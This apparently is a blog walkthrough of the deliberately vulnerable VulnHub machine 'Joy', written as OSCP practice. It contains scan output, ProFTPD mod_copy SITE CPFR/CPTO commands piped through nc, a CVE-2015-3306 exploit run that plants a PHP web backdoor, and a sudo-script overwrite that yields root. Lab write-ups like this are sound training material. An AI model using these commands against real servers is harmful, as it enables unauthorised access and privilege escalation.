Digitalworld Joy VulnHub WalkthroughNote: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time. Digitalworld.local Joy https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ This machine would have been much more complicated if not for enumeration. Most of the work was getting the initial shell, and after that, the box fell quickly. I learned that if I find a vulnerability with a public exploit, calm down, take note of it, and keep enumerating because there could be more exploits (more reliable/easy). For example, I wasted a lot more time on dropbear ssh exploit than I should have. Flow
Initial EnumerationNmap – TCP Portsnmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136 # Nmap 7.80 scan initiated Tue Jun 16 07:54:40 2020 as: nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136 Nmap scan report for 10.88.42.136 Host is up (0.00046s latency). Not shown: 65523 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.2.10 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download |_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload 22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0) 25/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.25 | http-ls: Volume / | SIZE TIME FILENAME | - 2016-07-19 20:03 ossec/ |_ |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Index of / 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: PIPELINING SASL TOP CAPA STLS AUTH-RESP-CODE UIDL RESP-CODES |_ssl-date: TLS randomness does not represent time 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: OK LITERAL+ IMAP4rev1 have ENABLE ID more IDLE post-login listed SASL-IR capabilities Pre-login STARTTLS LOGINDISABLEDA0001 LOGIN-REFERRALS |_ssl-date: TLS randomness does not represent time 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) 465/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_ssl-date: TLS randomness does not represent time 587/tcp open smtp Postfix smtpd |_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, | ssl-cert: Subject: commonName=JOY | Subject Alternative Name: DNS:JOY | Not valid before: 2018-12-23T14:29:24 |_Not valid after: 2028-12-20T14:29:24 |_ssl-date: TLS randomness does not represent time 993/tcp open ssl/imaps? |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3s? |_ssl-date: TLS randomness does not represent time MAC Address: 00:0C:29:32:A4:6A (VMware) Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s |_nbstat: NetBIOS name: JOY, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: joy | NetBIOS computer name: JOY\x00 | Domain name: \x00 | FQDN: joy |_ System time: 2020-06-16T19:54:56+08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-16T11:54:56 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jun 16 07:57:41 2020 -- 1 IP address (1 host up) scanned in 181.15 seconds Nmap – UDP PortsSNMP conveniently displays a process listing, netstat info, and installed packages. In addition, it shows TFTP service running on port 36969 that’s serving patrick’s home directory. I truncated the Nmap output a lot to show that. nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136 # Nmap 7.80 scan initiated Tue Jun 16 08:06:13 2020 as: nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136 Nmap scan report for 10.88.42.136 Host is up (0.00069s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc 123/udp open ntp NTP v4 (secondary server) | ntp-info: |_ 137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP) 138/udp open|filtered netbios-dgm 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: d1785e76ec962f5c00000000 | snmpEngineBoots: 29 |_ snmpEngineTime: 44m11s | snmp-interfaces: | lo | IP address: 127.0.0.1 Netmask: 255.0.0.0 | Type: softwareLoopback Speed: 10 Mbps | Traffic stats: 5.31 Kb sent, 5.31 Kb received | Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) | IP address: 10.88.42.136 Netmask: 255.255.255.0 | MAC address: 00:0c:29:32:a4:6a (VMware) | Type: ethernetCsmacd Speed: 1 Gbps |_ Traffic stats: 89.38 Mb sent, 241.11 Mb received | snmp-netstat: | TCP 0.0.0.0:21 0.0.0.0:0 | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 0.0.0.0:25 0.0.0.0:0 | TCP 0.0.0.0:110 0.0.0.0:0 | TCP 0.0.0.0:139 0.0.0.0:0 | TCP 0.0.0.0:143 0.0.0.0:0 | TCP 0.0.0.0:445 0.0.0.0:0 | TCP 0.0.0.0:465 0.0.0.0:0 | TCP 0.0.0.0:587 0.0.0.0:0 | TCP 0.0.0.0:993 0.0.0.0:0 | TCP 0.0.0.0:995 0.0.0.0:0 | TCP 127.0.0.1:631 0.0.0.0:0 | TCP 127.0.0.1:3306 0.0.0.0:0 | UDP 0.0.0.0:68 *:* | UDP 0.0.0.0:123 *:* | UDP 0.0.0.0:137 *:* | UDP 0.0.0.0:138 *:* | UDP 0.0.0.0:161 *:* | UDP 0.0.0.0:631 *:* | UDP 0.0.0.0:1900 *:* | UDP 0.0.0.0:5353 *:* | UDP 0.0.0.0:36969 *:* | UDP 0.0.0.0:42070 *:* | UDP 0.0.0.0:51704 *:* | UDP 10.88.42.136:123 *:* | UDP 10.88.42.136:137 *:* | UDP 10.88.42.136:138 *:* | UDP 10.88.42.255:137 *:* | UDP 10.88.42.255:138 *:* |_ UDP 127.0.0.1:123 *:* | snmp-processes: ... | 754: | Name: in.tftpd | Path: /usr/sbin/in.tftpd | Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick ... FTP – Anonymous FTPSince anonymous FTP is active and there are files to grab, I decided to grab them all. I’m not sure what the best tool is, but I’ve always used the lftp client to mirror FTP contents. mkdir ftp cd ftp lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136 FTP – FILES. ./download ./upload ./upload/project_yolo ./upload/project_malindo ./upload/project_woranto ./upload/project_flamingo ./upload/project_bravado ./upload/project_luyano ./upload/project_komodo ./upload/project_desperado ./upload/reminder ./upload/project_okacho ./upload/directory ./upload/project_toto ./upload/project_sicko ./upload/project_zoo ./upload/project_vivino ./upload/project_armadillo ./upload/project_polento ./upload/project_indigo ./upload/project_uno ./upload/project_emilio ./upload/project_ronaldinho FTP – upload/directoryMore confirmation that patrick is a user on the system. It also seems like this is /home/patrick (previously mentioned in the process listing via SNMP). Patrick's Directory total 128 drwxr-xr-x 18 patrick patrick 4096 Jun 16 20:10 . drwxr-xr-x 4 root root 4096 Jan 6 2019 .. -rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history -rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout -rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache drwx------ 10 patrick patrick 4096 Dec 26 2018 .config drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg -rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha -rw-r--r-- 1 patrick patrick 0 Jun 16 19:50 HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt -rw-r--r-- 1 patrick patrick 0 Jun 16 19:45 IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt -rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano -rw-r--r-- 1 patrick patrick 24 Jun 16 19:45 p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures -rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public -rw-r--r-- 1 patrick patrick 24 Jun 16 20:05 qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt -rw-r--r-- 1 patrick patrick 24 Jun 16 20:00 QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt d--------- 2 root root 4096 Jan 9 2019 script -rw-r--r-- 1 patrick patrick 24 Jun 16 19:50 sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt -rw-r--r-- 1 patrick patrick 0 Jun 16 20:05 soqjRoS2by1apdqTErDEQTspl2YuWgva.txt drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt -rw-r--r-- 1 patrick patrick 0 Jun 16 20:10 U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt -rw-r--r-- 1 patrick patrick 24 Jun 16 19:55 u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt -rw-r--r-- 1 patrick patrick 0 Jun 16 20:00 uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt -rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos -rw-r--r-- 1 patrick patrick 0 Jun 16 19:55 xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt -rw-r--r-- 1 patrick patrick 24 Jun 16 20:10 ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt You should know where the directory can be accessed. Information of this Machine! Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux What I Did Before UDP Scan FinishedDropbear SSH Exploit AttemptI wasted too much time getting tunnel vision on trying to exploit dropbear ssh (there’s an old exploit I spent time trying to get to work). It ultimately wasn’t fruitful. There’s an entry in searchsploit for it (exploits/linux/remote/387.c). ProFTPD Exploit AttemptI spent time on a searchsploit provided exploit (exploits/linux/remote/36803.py), but it requires the web directory. I did learn about CPFR and CPTO commands. I should have tried to use them to get patrick’s files. I’ll show it after the TFTP method (likely the intended method). What We Now Know
TFTP – Getting Patrick’s FilesNow we need to grab each of patrick’s files from TFTP using the file list. Be sure to remove “.” and “..” from the list of files. awk '/[0-9] /{print $9}' ftp/upload/directory > patrick_files.txt # remove . and .. from patrick_files.txt mkdir tftp cd tftp for file in `cat ../patrick_files.txt`; do echo -e "get $file\nquit\n"|tftp 10.88.42.136 36969; done for i in *; do echo ">> $i <<" && cat $i; done >> Desktop << >> Documents << >> Downloads << >> haha << >> HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt << >> IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt << >> Music << >> p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt << Patrick is hardworking! >> Pictures << >> Public << >> qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt << Patrick is hardworking! >> QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt << Patrick is hardworking! >> script << >> sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt << Patrick is hardworking! >> soqjRoS2by1apdqTErDEQTspl2YuWgva.txt << >> Sun << >> Templates << >> U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt << >> u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt << Patrick is hardworking! >> uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt << >> version_control << Version Control of External-Facing Services: Apache: 2.4.25 Dropbear SSH: 0.34 ProFTPd: 1.3.5 Samba: 4.5.12 We should switch to OpenSSH and upgrade ProFTPd. Note that we have some other configurations in this machine. 1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy. 2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out. >> Videos << >> x86_64 << >> xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt << >> ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt << Patrick is hardworking! FTP – Getting Patrick’s FilesWe can use the CPFR and CPTO trick to put patrick’s files in the upload directory. Be sure to remove . and .. from the file list, or you could fill up the hard disk (yes, I did it). This takes some guesswork if you don’t know where the FTP directory is, but I guessed/knew it was /home/ftp. for file in `cat patrick_files.txt`; do echo -e "site cpfr /home/patrick/$file\nsite cpto /home/ftp/upload/$file\nquit"|nc 10.88.42.136 21; done cd ftp && lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136; cd - Exploiting ProFTPDWe now know the web directory is /var/www/tryingharderisjoy, which is the last piece of information we needed to try to exploit for proftpd. I tried the exploit in searchsploit, but it didn’t work. So I went looking on the web and found https://github.com/t0kx/exploit-CVE-2015-3306/, which works! [18:10:35]🔥root[ /home/kali/VulnHub/joy ]# python3 exploit.py usage: exploit.py [-h] --host HOST --port PORT --path PATH exploit.py: error: the following arguments are required: --host, --port, --path [18:10:40]🔴->2 root[ /home/kali/VulnHub/joy ]# python3 exploit.py --host 10.88.42.136 --port 21 --path /var/www/tryingharderisjoy [+] CVE-2015-3306 exploit by t0kx [+] Exploiting 10.88.42.136:21 [+] Target exploited, acessing shell at http://10.88.42.136/backdoor.php [+] Running whoami: www-data [+] Done [18:11:30]🔥root[ /home/kali/VulnHub/joy ]# http://10.88.42.136/backdoor.php?cmd=COMMAND_HERE “which nc” returns nothing, so netcat isn’t installed. So, I went back to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to see the reverse shell options again. I tried the bash one, and it didn’t work. So I went to CyberChef to url encode the bash reverse shell. I tried the PHP one (since I know PHP is installed), and it did work. I also went to CyberChef to url encode the PHP reverse shell. ![]() Pivot to the Patrick UserLooking around, the ossec directory is there, so I looked inside of it. There’s a suspect file, “patricksecretsofjoy,” and it contains patrick’s password. [email protected]:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy cat patricksecretsofjoy credentials for JOY: patrick:apollo098765 root:howtheheckdoiknowwhattherootpasswordis how would these hack3rs ever find such a page? [email protected]:/var/www/tryingharderisjoy/ossec$ patrick:apollo098765 I tried to ssh in, but that didn’t work. [email protected]:~$ ssh [email protected] Unable to negotiate with 10.88.42.136 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1 I could, fortunately, su to patrick. ![]() Pivot to RootThere’s a sudo command that uses a custom command. Unfortunately, I couldn’t edit or read the file directly. ![]() But I could replace its contents using the FTP CPFR/CPTO trick from earlier. cd /dev/shm echo -e '#!/bin/sh\nsh\n'>test chmod +x test echo -e "site cpfr /dev/shm/test\nsite cpto /home/patrick/script/test\nquit"|nc 10.88.42.136 21 Then I ran the sudo command and got a root shell. ![]() Flag![]() |